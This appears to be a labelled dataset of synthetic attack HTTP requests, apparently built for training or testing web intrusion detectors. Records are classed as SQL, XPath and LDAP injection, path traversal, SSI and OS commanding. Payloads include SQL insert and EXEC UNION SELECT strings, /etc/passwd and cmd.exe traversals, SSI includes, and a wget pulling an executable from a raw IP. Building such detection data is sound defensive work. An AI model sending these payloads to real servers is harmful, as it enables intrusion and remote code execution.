GET /Oarbksh58rl5the/vTEfKwinnteu2Vwrmpnexec/sGtwbAmusm.Hw@X7EyLq/yxqD/lbTT.-n1yfjv4Ji3it.dll?Lhavingbodyn5FTEg=mleatr0t6s6rhnnot&eFfThcbnf=+nom&oliorqclpfzMV=srge%27+++or++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++++i%2B++++j+%2B++k%2B++l++%2B++++1%29%5D++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++%27t8aSf%27++%3D%27++azmGe%27++or&tjdoldt=7dnrohds&rfetdpe9e=29642300&mthwofHTtiwnaw=ctei HTTP/1.1
Host: www.yrttnto.ch:80
Connection: wl3aixs
Accept: audio/*;q=0.7, image/png, video/mpeg
Accept-Charset: iso-8859-1;q=0.9, cp-932;q=0.9, utf-8, x-mac-chinesetrad;q=0.4, x-mac-turkish
Accept-Encoding: *
Accept-Language: sttn-i, ct-dGt;q=0.6, dA-f, rqsocrS-Aosda;q=0.4
Cache-Control: ias0fi='h4'
Client-ip: 162.33.169.39
Cookie: sa=rsree9stnDsEeedfI;ilX=4
Cookie2: $Version="504"
Date: Fri, 06 May 05 19:01:07 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: alsrgDt=Ugteta;eyxh2
From: nui8@hgERemx.net
If-Modified-Since: Wed, 13 Feb 08 05:55:10 CET
If-Unmodified-Since: Sat, 30 Dec 06 20:18:42 UTC
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: Sat, 25 Oct 08 04:10:44 UTC
Max-Forwards: 6796
MIME-Version: 0.9
Pragma: ss=Fsatx
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: Digest cnonce="dRpveie"
Range: 87-22
Referer: http://u4fwor.net/n3ocfs.tar
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: 1rraoSjr3 (edpzlbpyZr; aOBVLjbo; slhawb; sb3xZzvVu; 3L_aye.exI)
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3997x7266
Via: HTTP/1.9 220.126.57.160, sel/7.7 www.p45ehwsb.jpg
Transfer-Encoding: deflate
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 566436568089581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48912
Start - Id: 35811
class: XPathInjection
GET /z2-SfY/xla2uurEeyqiryBah/pIVkf.z/sDMOiD2EnosUcp_3Jvde/ddGeavY/rgemnw.css?bKIzawLFMwhtpass=%28i++%3C+++++count%28thx%2Fchild%3A%3Atext%28%29%29+++and++++j+++%3C+++++count%28leocn%2Fchild%3A%3Acomment%28%29%29+and++k+%3C++++count%28Nrs%2Fchild%3A%3A*%29++++%29&hmUjhlpge=iMIu0dBYQNx%40&totstao8=q%2Fr8RprliCat&rUDiheeiect=lezbqIesn6aEapo&ed1hdoLeliem1L=6977768755&hopeeeWheised=486 HTTP/1.0
Host: 249.61.208.129
Connection: close
Accept: video/mpeg, audio/x-wav
Accept-Charset: *
Accept-Encoding: compress, identity, gzip;q=0.3, deflate
Accept-Language: *;q=0.6
Cache-Control: max-age=58805
Client-ip: 25.4.155.47
Cookie: otqAriewU3Sph5E=2osarnuiy;ewsa6sf=rcp4y|echomIT
Cookie2: $Version="52"
Date: Tue, 13 Nov 07 05:18:02 UTC
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: gH0ez@Sireoah.fr
If-Modified-Since: Fri, 20 Nov 09 02:49:41 CET
If-Unmodified-Since: Sun, 18 Mar 07 19:14:10 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: "fUyRhc4-aUSjFhwoPt"
If-Range: Fri, 23 Jun 06 03:05:49 UTC
Max-Forwards: 4
MIME-Version: 1.7
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest nc=007C8aF6
Range: 205-0247
Referer: /iabnruye/kaih3rqo/2oluouca/atRpoo.msf
TE: trailers,deflate,gzip;q=0.8
Trailer: If-None-Match
User-Agent: inoef6hz
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: Linux
UA-Pixels: 4135x5853
Via: la7Ee/6.4 www.n2hrsn0s.jpeg, 3.4 www.xdoettIt.png, FTP/4.1 www.xj90Rei.jpg
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 282 www.eOXt.htm "312bFgsaSoacoe" 
X-Forwarded-For: 43.11.206.228
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35811
Start - Id: 49217
class: XPathInjection
GET /cnE/yhbi1oriloyRsrlmute/xJJ/hTpXApzigOB9zQ@ym0pU/u0Z/ZBILeE0dmaZQX2/mndib0rqier/dGa/sVyMo-/wtsrJvge-.ix/iindres9f77ieDp/tluit0Hty.cgi?YB4rSLOperlc=%3Dopen&9vkmohhewnt558=hohtdlxWttt1ch6eh&eY=fsygCoat+insertf3metaa%27au&dleCqnbetol=hs&ea2ls=191072&fesirP=382623&Ieenu2x=%24%3Dde+otoohdeerT&ap=6194335956&PUN_wB9=h&dYiuruNh=09655767&danrn5Rosie=T0bme2slu6Kt9ad&yRraah=nr+Pf&4SLVUNIservicesHsx=o1%27+++or++TpmSbh%2Flwlit%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D588%5D+or++++%27sa%27++%3D++%27&cnj5T=imasccek%3CoetE&T9icrh10irndQo=4756 HTTP/1.0
Host: 202.223.22.75:80
Connection: keep-alive
Accept: application/*;q=0.0, application/zip
Accept-Charset: x-mac-arabic;q=0.2, windows-1257, iso-2022-jp, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 105.50.230.232
Cookie: Gestset=5;y1yresflnnisnQ=514;tzbottad1AsOOfr=iHhUweei;diirde0e6E=sp\t;sribislarsi5mm=d catd0N;sSEvaeetl=Idhefle
Cookie2: $Version="063"
Date: Wed, 10 Mar 04 05:19:08 GMT
ETag: "dw@.GFoRq8dCaQys.F"
Expect: 100-continue
From: lCae@ni91.be
If-Modified-Since: Wed, 05 Jul 06 01:14:10 GMT
If-Unmodified-Since: Thu, 08 Dec 05 18:15:47 UTC
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Sat, 26 Jun 04 06:58:23 UTC
Max-Forwards: 2444
MIME-Version: 9.6
Pragma: 7uehSe3=mvmng
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: negtt esueab=hroeocn
Range: -392691
Referer: /tmirae/hlxnrln/TtNoan/aNe6to.asmx
TE: trailers
Trailer: Authorization
User-Agent: eoz0MjS http://www.bO2wtear.st
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49217
Start - Id: 42109
class: SqlInjection
GET /e-3sXz1bMxHTL/hQreel7er5Enareaa0T.php?DOBmu=%27%3B+++insert++++into+++liN++values%28666%2C%27nqihe%27%2C%27yanutoLt%27%2C0xfffff%29&dtdidOiheedhe=t82tk7%3Bpusr5o&i0ptdaxinseho=h&UT0CL=etcieydhedelete+Tisimgpadminoen&neA=52&iossnctgbsoi54E=keoourie1eaWedpqc&ur8sn=f&nfUnoyiayKHgn=d3M&hweet=tl&jxZDZZnY5b_F=592389056&heryDoSqe=emh&seksdy=376145723 HTTP/1.1
Host: 1.38.82.2:7232
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.9, utf-7, windows-874, windows-874;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: i2do0ac-fk;q=0.4, Leh-saah, tr-alt;q=0.7, yOLn3-t, uaHvede-etfp;q=0.4
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: 3OA=njnrust;Cdd-.M.xterm=T=iframea;talm 3 between
Cookie2: $Version="882"
Date: Wed, 20 Feb 08 13:54:27 CET
ETag: "36ABV77V@jd_sdUj"
Expect: oeeEja9t=tncldfia;etnq3hno=qcai6udr
From: ri9it34@rxsle.fr
If-Modified-Since: Mon, 26 Jan 09 03:44:49 GMT
If-Unmodified-Since: Sun, 12 Mar 06 12:40:37 GMT
If-Match: "-fbhX_zHP2sTyqN"
If-None-Match: *
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 756
MIME-Version: 0.9
Pragma: NslsrH='er'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM cmVvQmlubGRvaXdkbnRjc3N5anN4cmFzbTZuZWJla2RzdW9hdQ==
Range: 80-3804,023297-91,09-
Referer: http://ssowjEye.biz/hmfasore/sougthr/nstt4.asp
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: esioodeb5/9.0.8
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: d6n3e; gsa4trel=As9O249
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42109
Start - Id: 36240
class: PathTransversal
GET /9DTrzf714/oPCme7ZviE5StkhmNr/4GaSnA-qjpassthruadmin/a3.M9ED7/1sIICdYl/9TCmIwp--dEm@/io8tErp8n/tawSs2pis8t/hZkOM0LN80xWmB2qrN/e@IopM4KO-0ye_VxeI1/llmPIrmDO4iGqAscript7.jpeg?iqeihqhf=ontoanrhyia&DCKh=+irsi&.7Jt5ZP6docB=hf%25beNee&ttRenoo=nRuoaccess_logaLt&uISenon=%3Ad&oer=ftp2+sock_streamt&tWhtacceshG1=9857137437&riiDt=ug HTTP/1.0
Host: 126.37.51.66
Connection: close
Accept: video/mpeg, audio/*, text/xml;q=0.3
Accept-Charset: x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 176.222.240.213
Cookie2: $Version="85"
Date: Sat, 19 Feb 05 18:14:49 GMT
From: en0d@lIae9iet.com
If-Modified-Since: Mon, 31 Jan 05 05:53:58 GMT
If-Unmodified-Since: Mon, 22 Feb 10 05:49:14 GMT
If-Range: "60eAIGGcAJUey0k.IDAt"
Max-Forwards: 887
Referer: http://www.nunthe.gov/wimea.jpeg
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Warning: 524 131.251.57.151:92246 "istvsstggkpeeehalc2Z" 

null

End - Id: 36240
Start - Id: 39262
class: SSI
GET /x1T_wAhdXO9K.pl?s8las77aau8t=jn5Ubodycnc&u0ae=nB&idFjieEd=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&tf2x=719 HTTP/1.0
Host: 14.182.88.20:43709
Connection: close
Accept: audio/*;q=0.8, image/*
Accept-Charset: macintosh;q=0.8
Accept-Encoding: *
Accept-Language: esoa-ii93, sl-tesswtS, g1iu-tAit3, jor-nllz
Cache-Control: max-age=6
Client-ip: 154.176.125.112
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="81"
Date: Mon, 12 Jan 09 21:44:09 UTC
ETag: W/"pa00PH_QOgAMJ0YO8_"
Expect: tnhoioon=ntmu;ndEx1r
From: ogpe@eKhmc.uk
If-Modified-Since: Thu, 19 Jun 08 08:12:12 UTC
If-Unmodified-Since: Mon, 05 May 08 10:30:15 CET
If-Match: "MshHTMQcmczuret_i1i"
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 3163
MIME-Version: 6.4
Pragma: hElt6='nh'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: Digest algorithm=felt
Range: 864-,5323-,-8736
Referer: http://fetn.gov/np4rn/usgl.dll
TE: gzip,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.6 (Windows; U; WinNT 3.5; nh-Te; rv:6.5.7) Gecko/42643533
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.3 www.eEio.tiff, 0.7 239.120.174.186:127, 3.1 www.ebth.jpg
Transfer-Encoding: compress
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39262
Start - Id: 44522
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Lgf5er.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: euc-cn, shift_jis
Accept-Encoding: 
Accept-Language: fawdeo-ftt7nd7, ae-hs;q=0.2, TdODri-sre0eE;q=0.2, nui-o88hars
Cache-Control: max-stale
Client-ip: 108.61.204.42
Cookie: Eadjaliet=e_uqTYYep;errndc9e=nVCKPxQ6OM;geH-RvR9=3567216;tfksitDnieRe=oJZ4kH05-h3
Cookie2: $Version="81"
Date: Mon, 23 May 05 04:34:20 CET
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Sat, 16 Apr 05 13:06:37 UTC
If-Unmodified-Since: Tue, 22 Feb 05 09:31:00 GMT
If-Match: "OYpkBKwDqtc@BqL"
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 8.5
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: http://www.eafnch.it/ERmi/bshrdtIo/ehvdu/3ra3s.php
TE: trailers
Trailer: Warning
User-Agent: efSphe/2.8.0.6
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x841
Via: HTTP/3.4 184.233.61.225, HTTP/2.8 195.249.94.183, 6.1 158.244.173.94
Transfer-Encoding: gzip
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 068 www.btrdkgr.jpg "Eisnha2tHnadpch3np" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44522
Start - Id: 43346
class: OsCommanding
GET /al/al/fee4En/uRcr7X359JrM_-/04ahF5o0caltentd/yj4W_@HrDFwoz1JoUU/0mBnnejsiS/JvW_Nv.html?bro=%5Cnwget+++++http%3A%2F%2F202.104.19.87%3A484%2Fnftp.exe&seyattoprnArnDr=92974&iaw=ld%3Fhire&xHeefnha=SNntouc&wkeroiwagoy=Eocscripts2kerwwlib&FnFFn.t=tipkhiotut&tohqfeiJvee=ns1&eavnmuiodMTocwe=dhh&7eC1rlceIt4elnw=5370&o8ten=oTrRi HTTP/1.0
Host: 43.169.246.141
Connection: MoideydA
Accept: text/html;q=0.0
Accept-Charset: iso-8859-9;q=0.3, macintosh;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="05"
Date: Fri, 03 Dec 04 09:04:53 CET
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Thu, 05 Apr 07 13:43:15 UTC
If-Unmodified-Since: Fri, 15 Sep 06 21:10:05 GMT
If-Match: *
If-None-Match: "jX5ohiZcI@m6RCZ"
If-Range: Tue, 28 Oct 08 04:25:18 CET
Max-Forwards: 74
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: desngn piBmna=tHse
Range: -3
Referer: /Alpteo.zip
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 8.2; tm-h3; rv:4.6.6) Gecko/76510818
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: 9.8 44.177.7.59, 7.9 www.0tso.jpg, 6.0 www.naoe5uRo.shtml
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 673 www.eotg.jpeg "ttFtvipf" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43346
Start - Id: 40605
class: SSI
GET /n_CHunionPetcJ/rcfimnieyOenxmnaph/olaessDarflnkid4ahee/auOlWRw/4oCPipy4NYFKq/ORXFnXtWCxYMj.M/oc/8J/fshu61ter9/lueiBs2qso/3n9rIsdiLAvl.jpeg?tirgdaih0=I+&W7gmW=t0oNryadosSoorba&rueg=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&iapotqgtnnr=661438785&sichteebahhan=eGHxU&2eewadnsaq=115792360&tho=988796 HTTP/1.1
Host: 198.154.28.26
Connection: close
Accept: text/*;q=0.8, image/jpeg
Accept-Charset: utf-7;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=6446
Client-ip: 146.4.65.176
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Thu, 10 Jun 04 11:23:25 CET
ETag: "ubA@PPhnTQYpotkU"
Expect: 100-continue
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Sun, 22 Jun 08 15:10:16 CET
If-Match: "0hstC8V1OR_eVE7gQ8"
If-None-Match: "rA-HwHduVOXsizf6"
If-Range: "MR9Bo26aIy028OtjrCuh"
Max-Forwards: 1
MIME-Version: 8.9
Pragma: oI4i='ut7iNsAa'
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: sLpp optl2ev6=eorea
Range: -7,-7178,-26215
Referer: http://www.iepaaoaw.org/yeewi/Re5n2ud/awweeAu.asp
TE: trailers,trailers,deflate
Trailer: Expect
User-Agent: 4hwieehtnDFti5t9ee
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 1.9 79.187.123.114:3936
Transfer-Encoding: gzip
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 431541377
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40605
Start - Id: 41622
class: SqlInjection
GET /0swttnlreeeeAatD3/qcruc6W/eXcexI@aOVZvquQc.css?iw1O=ie%7CaZreetcO&tfgloo3hhi=e%26yc&d5=%27++OR++%27ib%27++%3D+++N%27+++&n9=0&3VN3s44sOHF=dt%3Bt%3E&VP13sJRITIyq=cebe&Dt=864&ld5aE82ddc=rreHiIeoo3A0&nete=ez+noaira+xtermo9tr&eoeoh0l=rre HTTP/1.0
Host: www.lups.st
Connection: close
Accept: video/mpeg, text/plain
Accept-Charset: x-mac-arabic;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 166.71.235.134
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Fri, 10 Aug 07 19:42:29 GMT
ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: llbt0
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Oct 07 04:16:30 UTC
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: "cxlhbw7Kf3x.fkR4"
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Fri, 30 Oct 09 04:44:29 UTC
Max-Forwards: 488
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: NTLM ZVN1NnFuZGx2cmVvNWNoZHRzaXRrZHNxZmVOdGVodGFnbjJlMnNjb3I=
Range: 537-
Referer: http://www.wTkt.de/oEdedBr/esIipo5/lgedjs/ttxrxd7/ne0ieLl.pdf
TE: trailers
Trailer: Via
User-Agent: s717hnxia/7.1.5.8
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0620x1367
Via: 2.8 www.t5as.js
Transfer-Encoding: compress
Upgrade: n0A/2.2, tlanud/5.2
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41622
Start - Id: 44881
class: PathTransversal
GET /n2oUMsQUKjfsAqsZeQQ/ae0n2ospnaawh/zBJMU2d.asmx?u8V90u=0&aJcnWmi=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&huhrlnPo9Trelos=aeeeGbsteseu&2ntMaAz2nne=sd HTTP/1.1
Host: www.ehRs.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=61467
Client-ip: 32.25.74.7
Cookie: mfftpX='nph-;tZyrAf1aeyxuk=hYkHv;ie=houtwbtso3ao4tslr;N6iotatpo=tperliotmmo;hctn6QuId=atzhtM-J
Cookie2: $Version="7"
Date: Tue, 16 Mar 10 07:26:04 CET
ETag: "gWGomF2_V5lqmiTdX"
Expect: 100-continue
From: reecos@eeesftcx.gov
If-Modified-Since: Wed, 14 May 08 11:04:27 GMT
If-Unmodified-Since: Mon, 01 Aug 05 14:41:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 02 May 09 01:31:03 CET
Max-Forwards: 3
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic aUFhdWRlYXU6dHRybHJpYXI=
Range: -41,56231-,-8575
Referer: /mdno.tar.gz
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: fL8qAX http://www.l9eUoh.fr
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: HTTP/6.5 www.nikaStl.htm, 3.9 57.191.67.7:59
Transfer-Encoding: gzip
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44881
Start - Id: 39005
class: LdapInjection
POST /dL0@l/ilanatwOittn2dwid/mroe2a2shdfgInr3hc/A7c8ii9frdi3rT/eM6n/WWOxbHvoptS9m/Isass47itmtxnpnIrat/e3oyxnZfpIhHAa7/tHf2PaEv-w8CLMU.msf? HTTP/1.0
Content-Length: 46
Content-Language: eeu,wnsctm,nAa
Content-Encoding: compress
Content-Location: http://cauuTafm.com/nrejtsls/onloS6/satitw/eetee/uwtyA.asp
Content-MD5: ZmJSbnN0dmxhZ3RhZW9rOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 21:07:29 UTC
Last-Modified: Fri, 15 Jan 10 22:16:10 UTC
Host: www.roidf9asx.org:80
Connection: close
Accept: image/jpeg;q=0.4, application/*, text/*
Accept-Charset: iso-8859-15;q=0.9
Accept-Encoding: em4)(&(objectClass    =oue*)
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 205.198.95.102
Cookie: Tlohmu=nC.Zxij2rq.a;7as=wao0
Cookie2: $Version="84"
Date: Sun, 08 Apr 07 15:49:28 CET
ETag: W/"VPJnp3@veVviL60"
Expect: 100-continue
From: lThhoeh@8eere.gov
If-Modified-Since: Thu, 18 Nov 04 14:50:03 GMT
If-Unmodified-Since: Sat, 19 Sep 09 17:15:23 CET
If-Match: "xzYVfw_5@It4i0lNBG8"
If-None-Match: *
If-Range: *
Max-Forwards: 318
Authorization: Basic bW9rdDM6dTlsdXRhYW4=
Referer: http://www.nli1t.st/eodruv.gif
TE: chunked,trailers
User-Agent: auop/2.8
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: 8.1 172.112.26.215, 4.7 53.139.234.226, T7nnCn/7.5 229.54.231.42
Transfer-Encoding: compress
Warning: 594 119.1.173.178 "g1Reauu37zeat2agIeur" 

aYrErEcdwrcd=n5ag-i&ecer=53&YqA=?00&can4e9=3

End - Id: 39005
Start - Id: 42342
class: SqlInjection
GET /8q9Ze/0fW6N/xYhinDbC/rd/Satdseansctals/2ticeesmnmt.js?Uu5UFIDQ0=%3B+EXEC%28+++%27UNI%27%2B%27ON%27%2B%27++%27%2B%27SEL%27%2B%27ECT+++++++%27raex%27%2C6%2C56%2C%27si%27%2C9+++++FROM++++enew%29&Ay71u0sam_=45523&Rt9sutasf3iTf4=9467065&i5pgushn=a&ihttpmK=asvNH&7ttpneedwtuw=29%40e%5Bmpief%3AiframeI%25e-t&aecfEaathhcst=yJFh.MH8L HTTP/1.1
Host: www.hGya.fr
Connection: keep-alive
Accept: audio/basic, application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.69.56.127
Cookie: likeuM8D=9250156;8tirCslhofs=qtiWeie4(;ttypo=140058;pDirveiwgans=r-B-8Kv9tN;sGrf=ih(mnt5|il8fetcs0siAo
Cookie2: $Version="054"
Date: Fri, 20 Apr 07 11:49:53 GMT
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 100-continue
From: DiEa@y1ebyi.uk
If-Modified-Since: Sun, 12 Jul 09 03:08:24 CET
If-Unmodified-Since: Tue, 07 Sep 04 09:19:21 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 51
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: nrRny etsaey=elewdabt
Authorization: Digest realm
Range: -42018,-510767
Referer: /daeinaie/eonnacdn.swf
TE: gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: 9i8Tutaa (byBpU-P95y; vE-3ccR9Gi; qBlcQod_J; rH2fYooaQc)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: HTTP/7.4 www.ungit.jpg, 4.7 www.nyodtl.jpg, 6.2 5.187.23.67
Transfer-Encoding: deflate
Upgrade: eEtha/8.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 51653386435804651
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42342
Start - Id: 44136
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 73.239.245.167
Connection: oai6
Accept: text/html;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e4d-et42g
Cache-Control: no-transform
Client-ip: 139.133.159.204
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="549"
Date: Sun, 07 Oct 07 08:19:05 GMT
ETag: W/"1NbZPG6M0jtLITPTw7L"
Expect: a4isd=lhzrab3;nfrsWe=ryefi
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "rw.y_F08MZOaep8i"
If-None-Match: *
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 23
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: Basic eWVsZXJvN1I6b3ZybU1uZQ==
Range: 2856-325921,765830-7785,3752-597
Referer: http://www.rphssfo.org/sateIned/kApn2/msubla/1nudesr.dll
